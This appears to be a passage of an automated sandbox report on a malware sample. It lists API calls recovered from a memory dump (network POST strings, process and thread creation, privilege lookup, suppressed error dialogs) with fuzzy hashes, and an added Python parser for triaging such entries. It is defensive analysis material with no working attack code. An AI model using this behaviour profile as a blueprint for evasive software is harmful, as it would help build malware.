                                      • NtClose.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74D50,?,?,04D74D50,00000000,FFFFFFFF), ref: 04D7A4B5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001Close.00000009.00000002.932154419.00000000050
                                      • String ID:
                                      • API String ID: 2580148879-0
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: eb1942dc4466044f418a3eeaafd278adf9489b1cfc5c64c83da1da1600c63df7
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: 58D012752002146BD710EB98CC45E97775CEF44654F154455BA185B241D530F50086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 04D79128
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: POST$net.dll$wininet.dll
                                      • API String ID: 3472027048-3140911592
                                      • Opcode ID: 5c013a545853956603970ec79eb163839675d0f1abc2e2a68e5451647e95c5b8
                                      • Instruction ID: 26ac9ae94f0a984fc86c588cc892ec1a62dc655d0f06afe1ef3ca728e18cee8d
                                      • Opcode Fuzzy Hash: 5c013a545853956603970ec79eb163839675d0f1abc2e2a68e5451647e95c5b8
                                      • Instruction Fuzzy Hash: 2B31E2B2604344AFE714DF64CC84FABB7B4FF44714F00819AEA295B241E774B560CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAllocateHeap.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74536,?,04D74CAF,04D74CAF,?,04D74536,?,?,?,?,?,00000000,00000000,?), ref: 04D7A65D
                                      • RtlFreeHeap.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04D63AF8), ref: 04D7A69D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001Heap.00000009.00000002.932154419.00000000050$AllocateFree
                                      • String ID: .z`
                                      • API String ID: 47607806-1441809116
                                      • Opcode ID: 8bc93c323b02812d09e3c327acc3b06f11a6ccfc4b8439fd36e74d321482e4ec
                                      • Instruction ID: 2a236bed5172647a30154451f6bb22c0fc4e91230ea0d95f15cad2f616a7a3fb
                                      • Opcode Fuzzy Hash: 8bc93c323b02812d09e3c327acc3b06f11a6ccfc4b8439fd36e74d321482e4ec
                                      • Instruction Fuzzy Hash: 72F082B62405146FEB14EF98DC45DEB736DEF88751F118589F94C97350D231EC058AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 04D79128
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: 05a80047e35f6ed8bde0abf918ac5eff3183537a554bf32b9d54d31f7916fd02
                                      • Instruction ID: 73ce7d89f10f34d0724ee61874ef635242669341f8a3fbdddfb7fe5db3681304
                                      • Opcode Fuzzy Hash: 05a80047e35f6ed8bde0abf918ac5eff3183537a554bf32b9d54d31f7916fd02
                                      • Instruction Fuzzy Hash: 5C3192B2600744BBD714DF64C889F67B7F8FB48B04F10815DFA2A6B244E630B560CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04D63AF8), ref: 04D7A69D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001FreeHeap.00000009.00000002.932154419.00000000050
                                      • String ID: .z`
                                      • API String ID: 735901401-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: 1d257c3f1b88898d070d49e6e981dad34e6355c4184004d2a73dc4b9650468d3
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: DBE046B1200208ABDB18EF99CC48EAB77ACEF88754F118559FE085B341D630F910CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04D6836A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04D6838B
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: f20d2cea2a0cf7887ff6bbb550e22f1eae9ef2a86d6e1f65c8808a1a63db3ecc
                                      • Instruction ID: d13e033688f5036506ddc04b936036f5a59beca029eceb6866daa4023cba7a38
                                      • Opcode Fuzzy Hash: f20d2cea2a0cf7887ff6bbb550e22f1eae9ef2a86d6e1f65c8808a1a63db3ecc
                                      • Instruction Fuzzy Hash: 2501D471B812287BFB21A6949C42FFE7B2CAB41B55F040119FF04FA2C1E694750647F1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04D6836A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04D6838B
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                      • Instruction ID: 8f2af7b9acd107878d613e83d1387c38cc9535ca94f65279aea90668755ea818
                                      • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                      • Instruction Fuzzy Hash: 4901F231B812287BFB20AA949C02FBE772CAB40F54F040119FF04BA2C0F6A4790642F6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04D6838B
                                        • Part of subcall function 04D68310: PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04D6836A
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 37fb57d26e7098e0f78c75d28720d8ad1b158a391fc5ed203227cb564bcd527b
                                      • Instruction ID: 4d029ed0f9f10af94a3a149f04c439be03974b642170c82359e69ee3cc475b6d
                                      • Opcode Fuzzy Hash: 37fb57d26e7098e0f78c75d28720d8ad1b158a391fc5ed203227cb564bcd527b
                                      • Instruction Fuzzy Hash: FD51A4B1A013099FDB15EF64D885BEB77F8EB48308F10456DF94A97240EB70BA41CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrLoadDll.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(00000000,00000000,00000003,?), ref: 04D6AD62
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: C0000.00000040.00000001Dll.00000009.00000002.932154419.00000000050Load
                                      • String ID:
                                      • API String ID: 914370382-0
                                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction ID: 6a39b7520b3d4876a411c9f621b2ff8686caaf9f0da9182262710e90a8617d32
                                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction Fuzzy Hash: 45011EB5E4020DBBEF10DAA4DC41FDDB7B8AF44708F104595AA09A7240F671FB148BA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04D7A734
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 69130d7bdf9084143b0434511f49728ad3f2409834004126ff15b7f53631e3e9
                                      • Instruction ID: b1591cfdc20c237ba27d6c9d6342ed7909ddad6782d371bf68f157a0cc81bf8c
                                      • Opcode Fuzzy Hash: 69130d7bdf9084143b0434511f49728ad3f2409834004126ff15b7f53631e3e9
                                      • Instruction Fuzzy Hash: C601AFB2214108AFDB54DF99DC80EEB77AAAF8C754F158258FA0DD7250D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04D7A734
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: dfe0bdeba7478b73228c45ebed2b5897373adb40c5da7c14acf46d5fc9257fee
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: 8901AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04D6F050,?,?,00000000), ref: 04D791EC
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: e6864212cec58bb16d898c30f46e9f2b1993be37a127272d075349a2dc59e61b
                                      • Instruction ID: 049f4f7710d6e970230440585292faaa6ab08ca34642c994be70a9470f839a84
                                      • Opcode Fuzzy Hash: e6864212cec58bb16d898c30f46e9f2b1993be37a127272d075349a2dc59e61b
                                      • Instruction Fuzzy Hash: 3BE092733813043AF7306599AC02FA7B39CDB81B74F14002AFA0DEB2C0E995F40142A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04D6F050,?,?,00000000), ref: 04D791EC
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 245cfdcf418d8ab6fb544c9163bd6c18b1ef8c4dfbef0b0b1b9474d0affeb51f
                                      • Instruction ID: ab3836bff6dcefb83e33f316f2fe29997bbd582f35645c39b3583b06fb1c4f3b
                                      • Opcode Fuzzy Hash: 245cfdcf418d8ab6fb544c9163bd6c18b1ef8c4dfbef0b0b1b9474d0affeb51f
                                      • Instruction Fuzzy Hash: 77E0D8733802003AF73066689C43FE77798CF91B20F140019FA49AB2C1E995F80146A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAllocateHeap.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74536,?,04D74CAF,04D74CAF,?,04D74536,?,?,?,?,?,00000000,00000000,?), ref: 04D7A65D
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateC0000.00000040.00000001Heap.00000009.00000002.932154419.00000000050
                                      • String ID:
                                      • API String ID: 1433232253-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 81dbf39b390115ce03af64a11e4bd8d26c8972a81c1391d17b565f50f0e2a390
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: E6E046B1200208ABDB14EF99CC40EAB77ACEF88654F118559FE085B341C630F910CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,04D6F1D2,04D6F1D2,?,00000000,?,?), ref: 04D7A800
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: cd6d908c05df68e6765c3fdf865194c803d2426bb4af669121cdd8b90c4c6099
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: 9BE01AB12002086BDB10DF49CC84EEB77ADEF88654F118155FA0857241D930F8108BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,04D6F1D2,04D6F1D2,?,00000000,?,?), ref: 04D7A800
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 2fec95dbd57f8bb8595de5c0c12d67a1deaf23655696aadc36425ec16ec15d57
                                      • Instruction ID: db408477b9e02c4b96bbe6f8681700a5b92415554ab5b7adb049bc5b211ce12d
                                      • Opcode Fuzzy Hash: 2fec95dbd57f8bb8595de5c0c12d67a1deaf23655696aadc36425ec16ec15d57
                                      • Instruction Fuzzy Hash: E6E0DFB12042446FDB10DF65DC85EDB7FA8EF80210F148699FC885B202C934F515CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,04D68D14,?), ref: 04D6F6FB
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 45d8688550c4a9418d734937c74e878c661a0691b72690ec0c17b47b44d0bfe6
                                      • Instruction ID: abadc6d719a6e250f7be3e8dadde28b969127424b19dd4ebe026041bbdb9e656
                                      • Opcode Fuzzy Hash: 45d8688550c4a9418d734937c74e878c661a0691b72690ec0c17b47b44d0bfe6
                                      • Instruction Fuzzy Hash: 1AD02B297403042BF700FBE0DC03F2276859B45A14F150074FD49D73C3FC64E00041A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,04D68D14,?), ref: 04D6F6FB
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                      • Instruction ID: 1a377f250c9394e1a2815de1f8f83a5e384707560576998940d657d00d127d2a
                                      • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                      • Instruction Fuzzy Hash: 7DD05E617503082BE610AAA49C03F267289AB44A14F490064F949962C3E950F0004165
                                      Uniqueness

                                      Uniqueness Score: -1.00%
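Each block above records one call site in the 0x04D60000 dump region: the API and the module it resolved to, its arguments as seen at the call, the `ref` address of the call instruction, and the instruction-level fuzzy hash of the surrounding function. When triaging a report like this it helps to turn the blocks into records so the call sites can be grouped per API, unresolved targets (calls whose "module" is another memory-dump region rather than a loaded DLL) can be spotted, and constant arguments such as the `SetErrorMode(00008003)` mask can be decoded. The parser below is an added example written for this page, not Joe Sandbox code; its `SAMPLE` is constructed from four of the entries above, condensed to the lines the parser reads, and the `SEM_*` bit values are the public Windows SDK constants.

```python
"""Parse Joe Sandbox-style function entries ("APIs / Memory Dump Source /
Instruction Fuzzy Hash" blocks) into records for triage.  Example code for this
page, not the sandbox's own tooling.  SAMPLE is constructed from entries in the
report above, trimmed to the lines this parser consumes."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• Part of subcall function 04D68310: PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04D6836A
Memory Dump Source
• Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
• Instruction Fuzzy Hash: FD51A4B1A013099FDB15EF64D885BEB77F8EB48308F10456DF94A97240EB70BA41CBA5
Uniqueness Score: -1.00%
APIs
• LdrLoadDll.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(00000000,00000000,00000003,?), ref: 04D6AD62
Memory Dump Source
• Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
• Instruction Fuzzy Hash: 45011EB5E4020DBBEF10DAA4DC41FDDB7B8AF44708F104595AA09A7240F671FB148BA1
Uniqueness Score: -1.00%
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04D6F050,?,?,00000000), ref: 04D791EC
Memory Dump Source
• Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
• Instruction Fuzzy Hash: 3BE092733813043AF7306599AC02FA7B39CDB81B74F14002AFA0DEB2C0E995F40142A4
Uniqueness Score: -1.00%
APIs
• SetErrorMode.KERNELBASE(00008003,?,04D68D14,?), ref: 04D6F6FB
Memory Dump Source
• Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
• Instruction Fuzzy Hash: 1AD02B297403042BF700FBE0DC03F2276859B45A14F150074FD49D73C3FC64E00041A1
Uniqueness Score: -1.00%
"""

# One API line: optional "Part of subcall function X: " prefix, then
# Api.Module(args), ref: ADDR.  Module may be a dump-region name ending in "."
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<module>[^(]*?)\.?\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]+)$"
)
# A "module" that is really a memory-dump name: the target was not a loaded DLL.
DUMP_RE = re.compile(r"^\d{8}\.\d{8}\.\d+\.[0-9A-F]{16}")

# Windows SDK SetErrorMode flag values.
SEM_FLAGS = {
    0x0001: "SEM_FAILCRITICALERRORS",
    0x0002: "SEM_NOGPFAULTERRORBOX",
    0x0004: "SEM_NOALIGNMENTFAULTEXCEPT",
    0x8000: "SEM_NOOPENFILEERRORBOX",
}


def _parse_arg(tok):
    """'?' means the sandbox could not recover the value; else hex (may be signed)."""
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_entries(text):
    """Split the listing into one record per 'APIs' block."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "APIs":
            cur = {"calls": [], "dump": None, "fuzzy": None}
            entries.append(cur)
        elif cur is None:
            continue
        elif line.startswith("Source File:"):
            cur["dump"] = line.split(",")[0][len("Source File:"):].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur["fuzzy"] = line.split(":", 1)[1].strip()
        else:
            m = API_RE.match(line)
            if m:
                cur["calls"].append({
                    "api": m["api"], "module": m["module"], "ref": m["ref"],
                    "caller": m["caller"],
                    "args": [_parse_arg(a) for a in m["args"].split(",")],
                })
    return entries


def api_sites(entries):
    """API name -> sorted distinct call-site addresses."""
    sites = defaultdict(set)
    for e in entries:
        for c in e["calls"]:
            sites[c["api"]].add(c["ref"])
    return {k: sorted(v) for k, v in sites.items()}


def unresolved_calls(entries):
    """APIs whose call target resolved to a dump region, not a named module."""
    return [c["api"] for e in entries for c in e["calls"] if DUMP_RE.match(c["module"])]


def decode_error_mode(value):
    """Expand a SetErrorMode mask into SEM_* names (unknown bits kept as hex)."""
    names = [n for bit, n in SEM_FLAGS.items() if value & bit]
    rest = value & ~sum(SEM_FLAGS)
    if rest:
        names.append(hex(rest))
    return names


def error_mode_flags(entries):
    """Call-site address -> decoded flags for every SetErrorMode call with a known arg."""
    out = {}
    for e in entries:
        for c in e["calls"]:
            if c["api"] == "SetErrorMode" and c["args"] and c["args"][0] is not None:
                out[c["ref"]] = decode_error_mode(c["args"][0])
    return out


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    print(api_sites(recs))
    print("unresolved:", unresolved_calls(recs))
    print("error mode:", error_mode_flags(recs))
```

Running it on the constructed sample groups the four call sites by API, reports `LdrLoadDll` as the one call whose target is an unnamed region (the `00000009.00000002.932154419...` dump rather than ntdll), and decodes `00008003` at `04D6F6FB` as `SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX`, i.e. the process suppresses crash and missing-file dialogs before it continues.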

                                      Non-executed Functions